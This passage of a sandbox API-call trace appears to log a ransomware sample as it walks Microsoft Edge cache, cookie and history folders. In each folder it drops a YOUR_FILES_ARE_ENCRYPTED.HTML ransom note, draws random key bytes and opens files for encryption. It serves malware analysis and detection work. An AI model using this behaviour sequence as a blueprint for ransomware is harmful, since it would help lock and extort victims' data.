pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies") returned 101 [0116.237] GetProcessHeap () returned 0x600000 [0116.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.238] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies" [0116.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.239] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.239] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 0 [0116.239] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.239] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0116.239] GetProcessHeap () returned 0x600000 [0116.239] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.240] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.241] CloseHandle (hObject=0x32c) returned 1 [0116.241] GetProcessHeap () returned 0x600000 [0116.241] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.241] GetProcessHeap () returned 0x600000 [0116.241] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.241] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.241] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.241] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory") returned 101 [0116.241] GetProcessHeap () returned 0x600000 [0116.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.241] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory" [0116.241] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.242] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.242] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 0 [0116.242] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.242] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0116.242] GetProcessHeap () returned 0x600000 [0116.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.242] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.243] CloseHandle (hObject=0x32c) returned 1 [0116.243] GetProcessHeap () returned 0x600000 [0116.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.243] GetProcessHeap () returned 0x600000 [0116.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.244] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ff025b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3ff025b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3ff025b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0116.244] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.244] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft") returned 99 [0116.244] GetProcessHeap () returned 0x600000 [0116.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.245] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft" [0116.245] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft\\*" [0116.245] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ff025b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3ff025b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3ff025b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.246] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ff025b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3ff025b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3ff025b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.246] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ff025b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3ff025b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3ff025b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="Windows", cAlternateFileName="")) returned 1 [0116.246] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ff025b, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3ff025b, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3ff025b, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="Windows", cAlternateFileName="")) returned 0 [0116.246] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.246] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.246] GetProcessHeap () returned 0x600000 [0116.246] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.247] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.248] CloseHandle (hObject=0x32c) returned 1 [0116.248] GetProcessHeap () returned 0x600000 [0116.248] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.248] GetProcessHeap () returned 0x600000 [0116.248] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.248] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0116.248] StrStrIW (lpFirst="MicrosoftEdge", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.248] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge") returned 103 [0116.248] GetProcessHeap () returned 0x600000 [0116.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.248] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge" [0116.248] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\*" [0116.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.249] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x473d6c9, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x473d6c9, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.249] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="Cache", cAlternateFileName="")) returned 1 [0116.249] StrStrIW (lpFirst="Cache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.249] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache") returned 109 [0116.249] GetProcessHeap () returned 0x600000 [0116.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.250] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache" [0116.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\*" [0116.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.250] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x422c7d8, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="..", cAlternateFileName="")) returned 1 [0116.250] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0116.250] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.250] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\container.dat") returned 123 [0116.250] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.250] lstrlenW (lpString=".dat") returned 4 [0116.250] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0116.250] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0116.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\cache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0116.251] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0116.251] CloseHandle (hObject=0x324) returned 1 [0116.251] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188640, dwReserved1=0x3188570, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0116.251] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.251] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0116.251] GetProcessHeap () returned 0x600000 [0116.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 